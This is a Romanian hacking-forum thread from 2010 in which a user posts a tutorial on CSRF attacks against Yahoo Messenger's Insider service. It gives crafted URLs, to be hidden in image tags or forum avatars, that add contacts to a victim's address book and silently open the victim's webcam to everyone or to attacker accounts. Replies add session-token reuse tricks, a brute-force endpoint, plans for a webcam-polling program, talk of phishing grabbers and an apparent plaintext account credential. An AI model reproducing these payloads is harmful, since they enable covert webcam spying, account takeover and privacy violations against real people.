[CSRF] Yahoo Insider si acces Webcam!

[loki]

Continut:

1) Prezentare

2) Accesarea addressbook-ului

3) Accesarea webcamului fara aprobare

1) Prezentare

Toti ati auzit de yahoo insider. Cei mai multi merg pe ideea ca e panarama aia de fereastra care o inchizi cand deschizi mess-ul.

Yahoo insider reprezinta insa accesul web la intreg motorasul messengerului. Prin intermediul lui poti accesa diverse setari ale contului, ale yahoo-ului in format XML. Poti accesa address book-ul. Poti lista chat-rooms-urile. In anumite cazuri poti face si setari.

Bineinteles ca pentru a putea accesa trebuie sa fii logat. Am facut insa un test simplu si se pare ca cererile le poti face atat prin link direct cat si prin <IMG SRC>. Cu ce ajuta? Inseamna ca pot oricand trimite pe email unui user sub forma unei false fotografii un CSRF care ii va schimba anumite setari.

Nu trimiteti link-urile pe messenger. Persoana respectiva poate sa nu fie logata pe browser. Puteti insa trimite un astfel de link trecand printr-un redirect de login in yahoo.

Insiderul se acceseaza folosind link-ul:

http://insider.msg.yahoo.com/ycontent/?parametri

Lista de parametri (incompleta insa) extrasa din yahoo messenger (am dat copy-paste cum am gasit. %s inseamna ca primeste un sir, %d un numar).

&langpacks=%slangpacks
&slot=%dslottest
&ads=%sads
&notifications=%snotifications
&reliablemessaging=%s
&emoticonorder=%semoticonorder
&emoticon=%semoticons
&av=%sav
&imscanners=%simscanners
&settings=%ssettings
&userfeedback=%suserfeedback
&modules=%s
&defaultplugin=%s
&safeobjects=%s
&revokedplugin=%s
&sidepanel=%s
&contenttab=%s
&voicesmiley=%svoicesmiley
&partner=%spartner
&marketing=%smarketing
&logos=%slogos
&dct2=%s
&dct1=%s
&getgp=%sgameprowler
&audiblemenu=%saudiblerevoked
&getwc=%s
&chatcat=%s
&games=%s
&sms=%s
&searchbar=%ssearchbar
&url=%surls
&system=%ssystem
&imv=%simvironments
&filter=%s
&defaultcountry=1
&countries=%s

Exemple:

fmt=format. Ofera suplimentar numele feed-ului, nu stiu exact cu ce se mai ocupa dar l-am lasat in coada.

http://insider.msg.yahoo.com/ycontent/&fmt=2

Observatie: <content time="1266943437"></content> 1266943437 reprezinta numarul de secunde care au trecut de la data 01/01/1970 00:00:00 GMT (ora 2 in RO). Interesant pentru alte cereri, gen addessbook care ofera data la care ai facut un update.

Informatii despre chatrooms:

http://insider.msg.yahoo.com/ycontent/?chatcat&fmt=2

http://insider.msg.yahoo.com/ycontent/?chatroom_1000&fmt=2

Setarile de webcam:

http://insider.msg.yahoo.com/ycontent/?&getwc=0&fmt=2.0&intl=us&os=win&ver=10.0.0.1102?=en-US

Addressbook:

http://insider.msg.yahoo.com/ycontent/?ab2=1&intl=us&os=win%22&fmt=2

Ca fapt divers sa ne uitam la <farm id="458"/> Amintindu-mi de yahoo cookie generator, ID-ul (458 in acest caz) apare in subcookie-ul Td.SL (sled ID). SL decodat din base64 este de forma 458[0x01]123456789.

Lista tarilor si a codurilor telefonice:

http://insider.msg.yahoo.com/ycontent/?countries

System: http://insider.msg.yahoo.com/ycontent/?system&fmt=2

Imvironments: http://insider.msg.yahoo.com/ycontent/?imv

Sms: http://insider.msg.yahoo.com/ycontent/?sms=0

etc... Va mai jucati voi. Atentie insa, presupun ca e posibil sa va dereglati setarile asa ca nu lucrati pe contul de zi cu zi (mi-am stricat eu ceva si nu stiu cum)

Acum sa trecem la partea fierbinte:

Link-urile de mai jos cum am spus functioneaza atat timp cat persoana este logata in browser. Asta inseamna ca ori deschideti o sesiune in mail, ori trimiteti link-ul la o victima. Cazul 2 sub forma html cu <img src="link">

2) Accesarea addressbook-ului

Sa ne introducem in addressbook:

http://insider.msg.yahoo.com/ycontent/?addab=0&fname=Gigel&lname=Coaiegrele&yid=pulamea@yahoo.com&nname=pulamea

fname=first name

lname=last name

yid=yahoo id

nname=nickname

Verificati addressbook-ul pe

http://insider.msg.yahoo.com/ycontent/?ab&fmt=2

http://insider.msg.yahoo.com/ycontent/?ab2&fmt=2

Odata introdus nu va apare imediat in addressbook in yahoo messenger. Dar va apare la refresh in mail->contacts

Nu prea inseamna mult dar sa ajungem la partea si mai frumoasa:

3) Accesarea webcamului fara aprobare

Intrebarea existentiala CUM SA VEDEM WEBCAMUL FARA PERMISIUNE

Raspuns: setam messengerul:

messenger->preferences->webcam broadcast

bifam allow everyone.

Sau

bifam always allow the following people to view my webcam si adaugam contul dorit.

Cu alte cuvinte:

http://insider.msg.yahoo.com/ycontent/?setwc=1&img_quality=10&viewer_access=1&chat_access=1&ignore_view=0&intl=us

img_quality=[1-10]. 1=viteza 10=calitate.

viewer_access=[0-2]

0 - default: cere voie

1 - lasa pe toata lumea

2 - da voie numai la cei din lista

chat_access=[0-1] lasa toti userii din chat sa vada camera sau nu. Asta da pwn la labar!

Daca suntem baieti mai "sufletisti" hai sa ne bagam numai noi in lista de persoane autorizate:

http://insider.msg.yahoo.com/ycontent/?setwc=1&img_quality=10&viewer_access=2&chat_access=0&ignore_view=1&friends=pulete1@yahoo.com,pulete2@yahoo.com&fmt=2.0&intl=us&os=win&ver=10.0.0.1102?=en-US

friends=lista de useri acceptati, cu randurile despartite de virgula

ignore_view=[0-1] ignora alte cereri de la cei care nu sunt in lista

Pentru verificarea setarilor facute apelati getwc:

http://insider.msg.yahoo.com/ycontent/?getwc=1

Bineinteles ca victima va vedea cati useri il privesc, aici depinde de prostia victimei si de norocul vostru.

Sper sa gasesc mai multe sa pot continua!

Edited February 23, 2010 by loki

[Vlachs]

foarte interesant loki, felicitati

[loki]

Idee: unele forumuri accepta remote avatar. Ia bagati un link confectionat. Ar fi bine sa fie un forum "pe domeniu" si sa stiti niste ID-uri de persoane zgarcite la webcam.

[AlStar]

Felicitari loki. Este foarte interesant articolul.

[remuszica]

Bv Felicitari boosss

[N-W-A]

Foarte interesant, bravo.

[loki]

ms ms

mi-era teama ca ma grabeam si ma pierd in idei. Doamne, bine ca m-am facut inteles . E frumos faptul ca poti seta un messenger nu doar furand parola dar si furand o simpla sesiune.

Astept pareri despre celelalte setari din mess. Caut o metoda de a adauga useri in friendlist, nu numai contactele din adressbook.

[Guest Nemessis]

Bravo. Ceva pe gustul meu.

[loki]

cum ai extras parametrii din insider ?

sincer?

texteditor cu hex editor: mai intai find replace dupa 0x00 cu nimic ca sa nu am textele in unicode si sa pot da search. Am cautat cativa parametri pe care ii gasisem deja pe net si m-am chiorat pana am dat de lista aia (probabil era un array). Am lasat-o exact cum am gasit-o acolo, fara a adauga si ab,ab2, setwc.

Edited February 24, 2010 by loki

[Guest Nemessis]

Sau astepti pana iti iei script error la insider si poti vedea sursa

[Guest Nemessis]

loki poti urca undeva toate draciile te rog?

[loki]

loki poti urca undeva toate draciile te rog?

nu inteleg ce sa urc? momentan am numai partea teoretica, inca nu mi-am facut de cap cu ele, nu am fisiere pregatite. Faza cu webcamul am terminat-o imediat inainte de a scrie tutorialul.

Daca e nevoie am eu un host free pe undeva unde mai puneam grabbere.

Mai lucrez pe dupaamiaza la ele. Chiar, ce zici de un raid pe la yahoo chats? Dar ar fi bine sa mai pun la punct si altele. Exemplu: studiul unui log care sa salveze numele userului afectat ceea ce nu puteam face inainte cu un IMG ci doar cu iframe.

Sau astepti pana iti iei script error la insider si poti vedea sursa

chiar trebuie?

http://insider.msg.yahoo.com/go/in5id3r/

(a se observa protectie 1337: in5id3r)

Edited February 24, 2010 by loki

[Guest Nemessis]

Exista o eroare de script la insider care iti arata path la toate xml-urile pe care le contine. Ceva care afecteaza browserul folosit de ym. L-am salvat acum ceva timp dar nu mi-am dat interesul sa ma uit peste el prea mult si nu mai stiu pe unde dracu e. Totusi cu wireshark cred ca poti vedea toate requesturile.

Sunt curios daca poti activa cumva web-ul omului din http. Daca poti modifica in client anumite setari ma gandesc ca exista o mica sansa ca si web-ul sa poata fi pornit atata timp cat e selectata deja sursa video care trebuie. Sau macar yahoo call

Pe yahoo chat sunt doar boti. Nu stiu ce raid ar merge vs. boti

Sper ca realizezi ca micul tau tutorial o sa porneasca un nou tip de atacuri asupra yahoo messenger

[loki]

heeh abia astept atacurile Imi creste fundul de mandrie stiind ca suntem cred primii de pe net care publica solutia vechii probleme a accesarii webcamului. Sper sa nu ne luam un val de "conquiztadori" ca acum 2 ani.

Aa, cateva link-uri le-am aflat initial cautand pe google site:insider.msg.yahoo.com

Am mai studiat messul si insiderul cu httpanalyzer dar nu am gasit prea multe. O sa imi pun un wireshark.

Pe yahoo chats am intrat cand studiam camerele, in afara de bots exista insa ploaia de masculi deobicei prin canalele de lesbiene. Si mai sunt filipinezii. Insa astia imi dadeau ei sa ii vad, nu trebuia sa fac nimic. Disperanti! (ca protectie e bine de setat mesajele in single window sa nu te rupa botii). Aici ma tenteaza si un booter ceva.

Candva le dadeam link la grabber ca botii. Cu login. Muscau repede!

Edited February 24, 2010 by loki

[loki]

dupa studii indelungate care au durat vreo 2 ore.

cam toate setarile de messenger nu apeleaza la insider. Testat fiecare click cu un http monitor. Doar webcamul apeleaza setwc si game prowlerul apeleaza setgp. Asta din urma e doar setarea de a aparea la status cand joci ceva.

Ma intereseaza cine se pricepe mai bine sa faca un debug pe fakewebcam. Ce servere acceseaza pentru vizualizare. Ca as face un program in C care sa faca requesturi continuu pe o victima si atunci cand intra webcamul sa te anunte si sa-ti dea imagine.

Fapt divers: http://insider.msg.yahoo.com/ycontent/?imscanners

apare si trilulilu in lista. Hai Romania!

Inca o gaselnita, nu stiu la ce ar folosi:

Daca esti logat apeleaza:

https://login.yahoo.com/config/cookie_token - iti ofera tokenul de login.

copy token si in alt browser apeleaza

https://login.yahoo.com/config/reset_cookie_token?.token= <paste>

Imediat esti logat si pe celalalt browser.

Alte link-uri luate de pe un site:

https://login.yahoo.com/config/isp_verify_user?cookies=1&p=<parola>&l=<user> verifici userul, poate merge asta mai bine la brute

https://edit.yahoo.com/config/isp_verify_cookie verifici daca esti logat

https://edit.yahoo.com/config/isp_create_user este folosit la crearea userului, nu am reusit sa ii bag date acceptabile.

https://edit.yahoo.com/config/isp_suggest_email este apelat la crearea contului pentru a iti sugera mailuri valide.

Edited February 24, 2010 by loki

[Vlachs]

https://edit.yahoo.com/config/isp_create_user este folosit la crearea userului, nu am reusit sa ii bag date acceptabile.

nu inteleg de ce cere token daca ala il primeste fiecare user

ERROR:210:Required fields missing (expected l,p,token,secret,bd,sex,(zip|co|intl))

[Guest Nemessis]

https://login.yahoo.com/config/cookie_token - iti ofera tokenul de login.

copy token si in alt browser apeleaza

https://login.yahoo.com/config/reset..._token?.token= <paste>

Imediat esti logat si pe celalalt browser.

Astea au fost folosite si in programul beta de prelungire a vietii unui cookie la care a lucrat Slick.

[Guest Nemessis]

loki cere ajutor pe viprasys pentru webcam checker. Sigur au ceva la indemana acolo.

[loki]

https://login.yahoo.com/config/cookie_token - iti ofera tokenul de login.

copy token si in alt browser apeleaza

https://login.yahoo.com/config/reset..._token?.token= <paste>

Imediat esti logat si pe celalalt browser.

Astea au fost folosite si in programul beta de prelungire a vietii unui cookie la care a lucrat Slick.

uh mi-ai stricat surpriza, chiar asta doream sa verific. Initial primul tutorial despre asta lasa de inteles ca e ceva complicat incat mi-am pus de multe ori problema cum invarte yahoo sesiunea in jurul celor 2 saptamani.

[Guest Nemessis]

E necesar ca tokenul sa fie resetat de la acelasi ip ca si cel de pe care a fost creeat initial de victima. Teoretic e imposibil de reprodus acel token fara user si parola, iar daca ai user si parola nu ai mai avea nevoie de token.

[loki]

chiar verific.

tokenul se reseteaza la refresh. Pare destul sesiunea furata. Dar merge pare-se oricare token generat. Merge pe acelasi IP ca pe cel al userului care il cere. Mai verific.

reset_cookie_token e metoda folosita actual de yahoo messenger de a face login pe mail. Si foloseste un token de acolo. Stiam acu ceva timp ca tokenul expira relativ repede (minute, 1 ora) dar sesiunea ramane.

[loki]

inca ceva ce nu am prea bagat de seama:

pe mozilla salvez paginile. Mi-a tinut sesiunea deschisa in yahoo pe timp nedefinit. Nu am avut eu rabdare sa astept sa expire ca lucram pe zeci de conturi odata (I love porn, ex: artemisia_fairchild : onetwothree)

Ramane sa studiez una noua: pe m.yahoo.com foloseste la ora actuala un nou set de cookies. Nu ai aceeasi sesiune ca pe clasicul yahoo, nu foloseste Y si T ci ceva nou. De aia daca esti logat pe serviciile yahoo, acolo te poti loga cu alt cont. Sa fie o noua "incercare" de securitate?.... parca acolo am vazut un v=2 (versiunea)

Edited February 24, 2010 by loki

[Guest Nemessis]

Ai mesaj privat

[sherpishoru]

Inca o gaselnita, nu stiu la ce ar folosi:

Daca esti logat apeleaza:

https://login.yahoo.com/config/cookie_token - iti ofera tokenul de login.

copy token si in alt browser apeleaza

https://login.yahoo.com/config/reset_cookie_token?.token= <paste>

Imediat esti logat si pe celalalt browser.

Logat pe Firefox, incercat sa ma logez asa pe Opera, failed.

Sorry, the page you requested was not found.

Please check the URL for proper spelling...bla bla bla

Modifica adresa din login.yahoo.com in edit.yahoo.com si adauga la final

&.redir_from=LOGIN&.redir_from=REGISTRATION

Iar tokenul obtinut de aici

https://login.yahoo.com/config/cookie_token

e lung cat China

[loki]

Logat pe Firefox, incercat sa ma logez asa pe Opera, failed.

Modifica adresa din login.yahoo.com in edit.yahoo.com si adauga la final

&.redir_from=LOGIN&.redir_from=REGISTRATION

Iar tokenul obtinut de aici

https://login.yahoo.com/config/cookie_token

e lung cat China

nu omu, cand dai click pe butonu de mail din messenger te trimite la reset_cookie_token. Asa ca e imposibil sa nu iti mearga pe opera.

&.redir_from=LOGIN&.redir_from=REGISTRATION nu tre sa le adaugi, ti le adauga yahoo chiar la erorile 404 de pe edit.yahoo.com.